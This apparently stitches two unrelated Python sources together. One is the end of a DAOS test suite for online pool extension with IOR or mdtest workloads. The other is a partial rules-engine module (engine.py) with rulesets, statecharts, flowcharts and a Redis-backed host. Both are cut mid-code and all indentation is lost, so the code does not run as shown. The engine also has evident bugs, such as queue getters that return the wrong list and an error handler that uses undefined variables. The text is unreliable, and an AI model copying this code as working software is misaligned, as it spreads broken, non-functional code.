if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
# Start the daos_racer thread
if racer is True:
daos_racer_thread = threading.Thread(target=self.daos_racer_thread)
daos_racer_thread.start()
time.sleep(30)
for val in range(0, num_pool):
pool[val] = add_pool(self, connect=False)
pool[val].set_property("reclaim", "disabled")
# Extend the pool_uuid, rank and targets
for val in range(0, num_pool):
threads = []
self.pool = pool[val]
# Start the additional servers and extend the pool
self.log.info("Extra Servers = %s", self.extra_servers)
self.start_additional_servers(self.extra_servers)
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool)
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Make sure system map has all ranks in joined state.
for retry in range(0, 10):
scan_info = self.get_dmg_command().system_query()
if not check_system_query_status(scan_info):
if retry == 9:
self.fail("One or more servers not in expected status")
else:
break
# Launch the IOR or mdtest thread
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_extend(self.pool.uuid, self.ranks)
self.print_and_assert_on_rebuild_failure(output)
pver_extend = self.get_pool_version()
self.log.info("Pool Version after extend %s", pver_extend)
# Check pool version incremented after pool exclude
self.assertTrue(pver_extend > pver_begin,
"Pool Version Error: After extend")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
# Check data consistency for IOR in future
# Presently, we are running daos_racer in parallel
# to IOR and checking the data consistency only
# for the daos_racer objects after exclude
# and reintegration.
if racer is True:
daos_racer_thread.join()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool = pool[val]
self.pool.display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend(self):
"""Test ID: DAOS-4751
Test Description: Validate Online extend with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_csum
"""
self.log.info("Online Extend : With Checksum")
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_without_checksum(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend without checksum enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_without_csum
"""
self.log.info("Online Extend : Without Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_oclass(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with different
object class.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_oclass
"""
self.log.info("Online Extend : Oclass")
self.run_online_extend_test(1, oclass=self.test_oclass[0])
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_mdtest(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with mdtest application.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_mdtest
"""
self.log.info("Online Extend : Mdtest")
self.run_online_extend_test(1, app_name="mdtest")
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_with_aggregation(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with aggregation on.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_aggregation
"""
self.log.info("Online Extend : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_extend_test(1)
|
engine.py
|
import json
import copy
import rules
import threading
import inspect
import random
import time
import datetime
import os
import sys
import traceback
def _unix_now():
dt = datetime.datetime.now()
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
class Closure_Queue(object):
def __init__(self):
self._queued_posts = []
self._queued_asserts = []
self._queued_retracts = []
def get_queued_posts(self):
return self._queued_posts
def get_queued_asserts(self):
return self._queued_posts
def get_queued_retracts(self):
return self._queued_posts
def post(self, message):
if isinstance(message, Content):
message = message._d
self._queued_posts.append(message)
def assert_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_asserts.append(message)
def retract_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_retracts.append(message)
class Closure(object):
def __init__(self, host, state, message, handle, ruleset_name):
self.ruleset_name = ruleset_name
self.host = host
self.s = Content(state)
self._handle = handle
self._timer_directory = {}
self._cancelled_timer_directory = {}
self._message_directory = {}
self._queue_directory = {}
self._branch_directory = {}
self._fact_directory = {}
self._delete_directory = {}
self._retract_directory = {}
self._completed = False
self._deleted = False
self._start_time = _unix_now()
if isinstance(message, dict):
self._m = message
else:
self.m = []
for one_message in message:
if ('m' in one_message) and len(one_message) == 1:
one_message = one_message['m']
self.m.append(Content(one_message))
def get_timers(self):
return self._timer_directory
def get_cancelled_timers(self):
return self._cancelled_timer_directory
def get_branches(self):
return self._branch_directory
def get_messages(self):
return self._message_directory
def get_queues(self):
return self._queue_directory
def get_deletes(self):
return self._delete_directory
def get_facts(self):
return self._fact_directory
def get_retract_facts(self):
return self._retract_directory
def get_queue(self, ruleset_name):
if not ruleset_name in self._queue_directory:
self._queue_directory[ruleset_name] = Closure_Queue()
return self._queue_directory[ruleset_name]
def post(self, ruleset_name, message = None):
if not message:
message = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in message:
message['sid'] = self.s.sid
if isinstance(message, Content):
message = message._d
message_list = []
if ruleset_name in self._message_directory:
message_list = self._message_directory[ruleset_name]
else:
self._message_directory[ruleset_name] = message_list
message_list.append(message)
def delete(self, ruleset_name = None, sid = None):
if not ruleset_name:
ruleset_name = self.ruleset_name
if not sid:
sid = self.s.sid
if (ruleset_name == self.ruleset_name) and (sid == self.s.sid):
self._deleted = True
sid_list = []
if ruleset_name in self._delete_directory:
sid_list = self._delete_directory[ruleset_name]
else:
self._delete_directory[ruleset_name] = sid_list
sid_list.append(sid)
def start_timer(self, timer_name, duration, manual_reset = False):
if timer_name in self._timer_directory:
raise Exception('Timer with name {0} already added'.format(timer_name))
else:
timer = {'sid': self.s.sid, '$t': timer_name}
self._timer_directory[timer_name] = (timer, duration, manual_reset)
def cancel_timer(self, timer_name):
if timer_name in self._cancelled_timer_directory:
raise Exception('Timer with name {0} already cancelled'.format(timer_name))
else:
self._cancelled_timer_directory[timer_name] = True
def _retract_timer(self, timer_name, message):
if '$t' in message and message['$t'] == timer_name:
self.retract_fact(message)
return True
for property_name, property_value in message.items():
if isinstance(property_value, dict) and self._retract_timer(timer_name, property_value):
return True
return False
def reset_timer(self, timer_name):
if self._m:
return self._retract_timer(timer_name, self._m)
else:
for message in self.m:
if self._retract_timer(timer_name, message):
return True
return False
def assert_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
fact_list = []
if ruleset_name in self._fact_directory:
fact_list = self._fact_directory[ruleset_name]
else:
self._fact_directory[ruleset_name] = fact_list
fact_list.append(fact)
def retract_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
retract_list = []
if ruleset_name in self._retract_directory:
retract_list = self._retract_directory[ruleset_name]
else:
self._retract_directory[ruleset_name] = retract_list
retract_list.append(fact)
def renew_action_lease(self):
if _unix_now() - self._start_time < 10:
self._start_time = _unix_now()
self.host.renew_action_lease(self.ruleset_name, self.s.sid)
def _has_completed(self):
if _unix_now() - self._start_time > 10:
self._completed = True
value = self._completed
self._completed = True
return value
def _is_deleted(self):
return self._deleted
def __getattr__(self, name):
if name == '_m':
return None
if name in self._m:
return Content(self._m[name])
else:
return None
class Content(object):
def items(self):
return self._d.items()
def __init__(self, data):
self._d = data
def __getitem__(self, key):
if key in self._d:
data = self._d[key]
if isinstance(data, dict):
data = Content(data)
return data
else:
return None
def __setitem__(self, key, value):
if value == None:
del self._d[key]
elif isinstance(value, Content):
self._d[key] = value._d
else:
self._d[key] = value
def __iter__(self):
return self._d.__iter__
def __contains__(self, key):
return key in self._d
def __getattr__(self, name):
return self.__getitem__(name)
def __setattr__(self, name, value):
if name == '_d':
self.__dict__['_d'] = value
else:
self.__setitem__(name, value)
def __repr__(self):
return repr(self._d)
def __str__(self):
return str(self._d)
class Promise(object):
def __init__(self, func):
self._func = func
self._next = None
self._sync = True
self._timer = None
self.root = self
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count == 2:
self._sync = False
elif arg_count != 1:
raise Exception('Invalid function signature')
def continue_with(self, next):
if (isinstance(next, Promise)):
self._next = next
elif (hasattr(next, '__call__')):
self._next = Promise(next)
else:
raise Exception('Unexpected Promise Type')
self._next.root = self.root
return self._next
def run(self, c, complete):
def timeout(max_time):
if _unix_now() > max_time:
c.s.exception = 'timeout expired'
complete(None)
else:
c.renew_action_lease()
self._timer = threading.Timer(5, timeout, (max_time, ))
self._timer.daemon = True
self._timer.start()
if self._sync:
try:
self._func(c)
except BaseException as error:
c.s.exception = 'exception caught {0}'.format(str(error))
except:
c.s.exception = 'unknown exception'
if self._next:
self._next.run(c, complete)
else:
complete(None)
else:
try:
def callback(e):
if self._timer:
self._timer.cancel()
self._timer = None
if e:
c.s.exception = str(e)
if self._next:
self._next.run(c, complete)
else:
complete(None)
time_left = self._func(c, callback)
if time_left:
self._timer = threading.Timer(5, timeout, (_unix_now() + time_left, ))
self._timer.daemon = True
self._timer.start()
except BaseException as error:
c.s.exception = 'exception caught {0}'.format(str(error))
complete(None)
except:
c.s.exception = 'unknown exception'
complete(None)
class To(Promise):
def __init__(self, from_state, to_state, assert_state):
super(To, self).__init__(self._execute)
self._from_state = from_state
self._to_state = to_state
self._assert_state = assert_state
def _execute(self, c):
c.s.running = True
if self._from_state != self._to_state:
if self._from_state:
if c.m and isinstance(c.m, list):
c.retract_fact(c.m[0].chart_context)
else:
c.retract_fact(c.chart_context)
if self._assert_state:
c.assert_fact({ 'label': self._to_state, 'chart': 1 })
else:
c.post({ 'label': self._to_state, 'chart': 1 })
class Ruleset(object):
def __init__(self, name, host, ruleset_definition, state_cache_size):
self._actions = {}
self._name = name
self._host = host
for rule_name, rule in ruleset_definition.items():
action = rule['run']
del rule['run']
if isinstance(action, str):
self._actions[rule_name] = Promise(host.get_action(action))
elif isinstance(action, Promise):
self._actions[rule_name] = action.root
elif (hasattr(action, '__call__')):
self._actions[rule_name] = Promise(action)
self._handle = rules.create_ruleset(state_cache_size, name, json.dumps(ruleset_definition, ensure_ascii=False))
self._definition = ruleset_definition
def bind(self, databases):
for db in databases:
if isinstance(db, str):
rules.bind_ruleset(0, 0, db, None, self._handle)
else:
if not 'password' in db:
db['password'] = None
if not 'db' in db:
db['db'] = 0
rules.bind_ruleset(db['port'], db['db'], db['host'], db['password'], self._handle)
def assert_event(self, message):
return rules.assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def queue_assert_event(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_event(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_event(self, message):
return rules.start_assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def assert_events(self, messages):
return rules.assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def start_assert_events(self, messages):
return rules.start_assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def assert_fact(self, fact):
return rules.assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_assert_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_fact(self, fact):
return rules.start_assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def assert_facts(self, facts):
return rules.assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_assert_facts(self, facts):
return rules.start_assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def retract_fact(self, fact):
return rules.retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_retract_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_retract_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_retract_fact(self, fact):
return rules.start_retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def retract_facts(self, facts):
return rules.retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_retract_facts(self, facts):
return rules.start_retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_timer(self, sid, timer, timer_duration, manual_reset):
if sid != None:
sid = str(sid)
rules.start_timer(self._handle, timer_duration, manual_reset, json.dumps(timer, ensure_ascii=False), sid)
def cancel_timer(self, sid, timer_name):
if sid != None:
sid = str(sid)
rules.cancel_timer(self._handle, sid, timer_name)
def assert_state(self, state):
if 'sid' in state:
return rules.assert_state(self._handle, str(state['sid']), json.dumps(state, ensure_ascii=False))
else:
return rules.assert_state(self._handle, None, json.dumps(state, ensure_ascii=False))
def get_state(self, sid):
if sid != None:
sid = str(sid)
return json.loads(rules.get_state(self._handle, sid))
def delete_state(self, sid):
if sid != None:
sid = str(sid)
rules.delete_state(self._handle, sid)
def renew_action_lease(self, sid):
if sid != None:
sid = str(sid)
rules.renew_action_lease(self._handle, sid)
def get_definition(self):
return self._definition
@staticmethod
def create_rulesets(parent_name, host, ruleset_definitions, state_cache_size):
branches = {}
for name, definition in ruleset_definitions.items():
if name.rfind('$state') != -1:
name = name[:name.rfind('$state')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Statechart(name, host, definition, state_cache_size)
elif name.rfind('$flow') != -1:
name = name[:name.rfind('$flow')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Flowchart(name, host, definition, state_cache_size)
else:
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Ruleset(name, host, definition, state_cache_size)
return branches
def dispatch_timers(self, complete):
try:
if not rules.assert_timers(self._handle):
complete(None, True)
else:
complete(None, False)
except Exception as error:
complete(error, True)
return
def dispatch(self, complete, async_result = None):
state = None
action_handle = None
action_binding = None
result_container = {}
if async_result:
state = async_result[0]
result_container = {'message': json.loads(async_result[1])}
action_handle = async_result[2]
action_binding = async_result[3]
else:
try:
result = rules.start_action(self._handle)
if not result:
complete(None, True)
return
else:
state = json.loads(result[0])
result_container = {'message': json.loads(result[1])}
action_handle = result[2]
action_binding = result[3]
except BaseException as error:
t, v, tb = sys.exc_info()
print('start action base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete(error, True)
return
except:
t, v, tb = sys.exc_info()
print('start action unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete('unknown error', True)
return
while 'message' in result_container:
action_name = None
for action_name, message in result_container['message'].items():
break
del(result_container['message'])
c = Closure(self._host, state, message, action_handle, self._name)
def action_callback(e):
if c._has_completed():
return
if e:
rules.abandon_action(self._handle, c._handle)
complete(e, True)
else:
try:
for timer_name, timer in c.get_cancelled_timers().items():
self.cancel_timer(c.s['sid'], timer_name)
for timer_id, timer_tuple in c.get_timers().items():
self.start_timer(c.s['sid'], timer_tuple[0], timer_tuple[1], timer_tuple[2])
for ruleset_name, q in c.get_queues().items():
for message in q.get_queued_posts():
self.queue_assert_event(message['sid'], ruleset_name, message)
for message in q.get_queued_asserts():
self.queue_assert_fact(message['sid'], ruleset_name, message)
for message in q.get_queued_retracts():
self.queue_retract_fact(message['sid'], ruleset_name, message)
for ruleset_name, sid in c.get_deletes().items():
self._host.delete_state(ruleset_name, sid)
binding = 0
replies = 0
pending = {action_binding: 0}
for ruleset_name, facts in c.get_retract_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_retract_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_retract_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, facts in c.get_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_assert_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_assert_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, messages in c.get_messages().items():
if len(messages) == 1:
binding, replies = self._host.start_post(ruleset_name, messages[0])
else:
binding, replies = self._host.start_post_batch(ruleset_name, messages)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
binding, replies = rules.start_update_state(self._handle, c._handle, json.dumps(c.s._d, ensure_ascii=False))
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for binding, replies in pending.items():
if binding != 0:
if binding != action_binding:
rules.complete(binding, replies)
else:
new_result = rules.complete_and_start_action(self._handle, replies, c._handle)
if new_result:
if 'async' in result_container:
def terminal(e, wait):
return
self.dispatch(terminal, [state, new_result, action_handle, action_binding])
else:
result_container['message'] = json.loads(new_result)
except BaseException as error:
t, v, tb = sys.exc_info()
print('base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete(error, True)
except:
print('unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete('unknown error', True)
if c._is_deleted():
try:
self.delete_state(c.s.sid)
except BaseException as error:
complete(error, True)
if 'async' in result_container:
del result_container['async']
self._actions[action_name].run(c, action_callback)
result_container['async'] = True
complete(None, False)
class Statechart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(None, None, None, chart_definition, ruleset_definition)
super(Statechart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'stateChart'
def _transform(self, parent_name, parent_triggers, parent_start_state, chart_definition, rules):
start_state = {}
reflexive_states = {}
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
start_state[qualified_name] = True
for trigger_name, trigger in state.items():
if ('to' in trigger and trigger['to'] == state_name) or 'count' in trigger or 'cap' in trigger:
reflexive_states[qualified_name] = True
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
triggers = {}
if parent_triggers:
for parent_trigger_name, trigger in parent_triggers.items():
triggers['{0}.{1}'.format(qualified_name, parent_trigger_name)] = trigger
for trigger_name, trigger in state.items():
if trigger_name != '$chart':
if ('to' in trigger) and parent_name:
trigger['to'] = '{0}.{1}'.format(parent_name, trigger['to'])
triggers['{0}.{1}'.format(qualified_name, trigger_name)] = trigger
if '$chart' in state:
self._transform(qualified_name, triggers, start_state, state['$chart'], rules)
else:
for trigger_name, trigger in triggers.items():
rule = {}
state_test = {'chart_context': {'$and':[{'label': qualified_name}, {'chart': 1}]}}
if 'pri' in trigger:
rule['pri'] = trigger['pri']
if 'count' in trigger:
rule['count'] = trigger['count']
if 'cap' in trigger:
rule['cap'] = trigger['cap']
if 'all' in trigger:
rule['all'] = list(trigger['all'])
rule['all'].append(state_test)
elif 'any' in trigger:
rule['all'] = [state_test, {'m$any': trigger['any']}]
else:
rule['all'] = [state_test]
if 'run' in trigger:
if isinstance(trigger['run'], str):
rule['run'] = Promise(self._host.get_action(trigger['run']))
elif isinstance(trigger['run'], Promise):
rule['run'] = trigger['run']
elif hasattr(trigger['run'], '__call__'):
rule['run'] = Promise(trigger['run'])
if 'to' in trigger:
from_state = None
if qualified_name in reflexive_states:
from_state = qualified_name
to_state = trigger['to']
assert_state = False
if to_state in reflexive_states:
assert_state = True
if 'run' in rule:
rule['run'].continue_with(To(from_state, to_state, assert_state))
else:
rule['run'] = To(from_state, to_state, assert_state)
if to_state in start_state:
del start_state[to_state]
if parent_start_state and to_state in parent_start_state:
del parent_start_state[to_state]
else:
raise Exception('Trigger {0} destination not defined'.format(trigger_name))
rules[trigger_name] = rule;
started = False
for state_name in start_state.keys():
if started:
raise Exception('Chart {0} has more than one start state {1}'.format(self._name, state_name))
started = True
if parent_name:
rules[parent_name + '$start'] = {'all':[{'chart_context': {'$and': [{'label': parent_name}, {'chart':1}]}}], 'run': To(None, state_name, False)};
else:
rules['$start'] = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}], 'run': To(None, state_name, False)};
if not started:
raise Exception('Chart {0} has no start state'.format(self._name))
class Flowchart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(chart_definition, ruleset_definition)
super(Flowchart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'flowChart'
def _transform(self, chart_definition, rules):
visited = {}
reflexive_stages = {}
for stage_name, stage in chart_definition.items():
if 'to' in stage:
if isinstance(stage['to'], str):
if stage['to'] == stage_name:
reflexive_stages[stage_name] = True
else:
for transition_name, transition in stage['to'].items():
if transition_name == stage_name or 'count' in transition or 'cap' in transition:
reflexive_stages[stage_name] = True
for stage_name, stage in chart_definition.items():
stage_test = {'chart_context': {'$and':[{'label': stage_name}, {'chart':1}]}}
from_stage = None
if stage_name in reflexive_stages:
from_stage = stage_name
if 'to' in stage:
if isinstance(stage['to'], str):
next_stage = None
rule = {'all': [stage_test]}
if stage['to'] in chart_definition:
next_stage = chart_definition[stage['to']]
else:
raise Exception('Stage {0} not found'.format(stage['to']))
assert_stage = False
if stage['to'] in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, stage['to'], assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, stage['to'])] = rule
visited[stage['to']] = True
else:
for transition_name, transition in stage['to'].items():
rule = {}
next_stage = None
if 'pri' in transition:
rule['pri'] = transition['pri']
if 'count' in transition:
rule['count'] = transition['count']
if 'cap' in transition:
rule['cap'] = transition['cap']
if 'all' in transition:
rule['all'] = list(transition['all'])
rule['all'].append(stage_test)
elif 'any' in transition:
rule['all'] = [stage_test, {'m$any': transition['any']}]
else:
rule['all'] = [stage_test]
if transition_name in chart_definition:
next_stage = chart_definition[transition_name]
else:
raise Exception('Stage {0} not found'.format(transition_name))
assert_stage = False
if transition_name in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, transition_name, assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, transition_name)] = rule
visited[transition_name] = True
started = False
for stage_name, stage in chart_definition.items():
if not stage_name in visited:
if started:
raise Exception('Chart {0} has more than one start state'.format(self._name))
rule = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}]}
if not 'run' in stage:
rule['run'] = To(None, stage_name, False)
else:
if isinstance(stage['run'], str):
rule['run'] = To(None, stage_name, False).continue_with(Promise(self._host.get_action(stage['run'])))
elif isinstance(stage['run'], Promise) or hasattr(stage['run'], '__call__'):
rule['run'] = To(None, stage_name, False).continue_with(stage['run'])
rules['$start.{0}'.format(stage_name)] = rule
started = True
class Host(object):
def __init__(self, ruleset_definitions = None, databases = None, state_cache_size = 1024):
if not databases:
databases = [{'host': 'localhost', 'port': 6379, 'password': None, 'db': 0}]
self._ruleset_directory = {}
self._ruleset_list = []
self._databases = databases
self._state_cache_size = state_cache_size
if ruleset_definitions:
self.register_rulesets(None, ruleset_definitions)
def get_action(self, action_name):
raise Exception('Action with name {0} not found'.format(action_name))
def load_ruleset(self, ruleset_name):
raise Exception('Ruleset with name {0} not found'.format(ruleset_name))
def save_ruleset(self, ruleset_name, ruleset_definition):
return
def get_ruleset(self, ruleset_name):
if ruleset_name in self._ruleset_directory:
return self._ruleset_directory[ruleset_name]
else:
ruleset_definition = self.load_ruleset(ruleset_name)
self.register_rulesets(None, ruleset_definition)
return self._ruleset_directory[ruleset_name]
def set_ruleset(self, ruleset_name, ruleset_definition):
self.register_rulesets(None, ruleset_definition)
self.save_ruleset(ruleset_name, ruleset_definition)
def get_state(self, ruleset_name, sid):
return self.get_ruleset(ruleset_name).get_state(sid)
def delete_state(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).delete_state(sid)
def get_ruleset_state(self, ruleset_name):
return self.get_ruleset(ruleset_name).get_ruleset_state(sid)
def post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).assert_events(messages)
def start_post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).start_assert_events(messages)
def post(self, ruleset_name, message):
return self.get_ruleset(ruleset_name).assert_event(message)
def start_post(self, ruleset_name, message):
return self.get_ruleset(ruleset_name).start_assert_event(message)
def assert_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).assert_fact(fact)
def start_assert_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_assert_fact(fact)
def assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).assert_facts(facts)
def start_assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_assert_facts(facts)
def retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).retract_fact(fact)
def start_retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_retract_fact(fact)
def retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).retract_facts(facts)
def start_retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_retract_facts(facts)
def patch_state(self, ruleset_name, state):
return self.get_ruleset(ruleset_name).assert_state(state)
def renew_action_lease(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).renew_action_lease(sid)
def register_rulesets(self, parent_name, ruleset_definitions):
print(ruleset_definitions)
rulesets = Ruleset.create_rulesets(parent_name, self, ruleset_definitions, self._state_cache_size)
for ruleset_name, ruleset in rulesets.items():
if ruleset_name in self._ruleset_directory:
raise Exception('Ruleset with name {0} already registered'.format(ruleset_name))
else:
self._ruleset_directory[ruleset_name] = ruleset
self._ruleset_list.append(ruleset)
ruleset.bind(self._databases)
return list(rulesets.keys())
def run(self):
def dispatch_ruleset(index, wait):
def callback(e, w):
inner_wait = wait
if e:
if str(e).find('306') == -1:
print('Exiting {0}'.format(str(e)))
os._exit(1)
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._d_timer = threading.Timer(0.25, dispatch_ruleset, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
self._d_timer = threading.Thread(target = dispatch_ruleset, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
if not len(self._ruleset_list):
self._d_timer = threading.Timer(0.5, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch(callback)
def dispatch_timers(index, wait):
def callback(e, w):
inner_wait = wait
if e:
print('Error {0}'.format(str(e)))
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._t_timer = threading.Timer(0.25, dispatch_timers, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
self._t_timer = threading.Thread(target = dispatch_timers, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
if not len(self._ruleset_list):
self._t_timer = threading.Timer(0.5, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch_timers(callback)
self._d_timer = threading.Timer(0.1, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
self._t_timer = threading.Timer(0.1, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
class Queue(object):
def __init__(self, ruleset_name, database = None, state_cache_size = 1024):
if not database:
database = {'host': 'localhost', 'port': 6379, 'password':None, 'db': 0}
self._ruleset_name = ruleset_name
self._handle = rules.create_client(state_cache_size, ruleset_name)
if isinstance(database, str):
rules.bind_ruleset(0, 0, database, None, self._handle)
else:
if not 'password' in database:
database['password'] = None
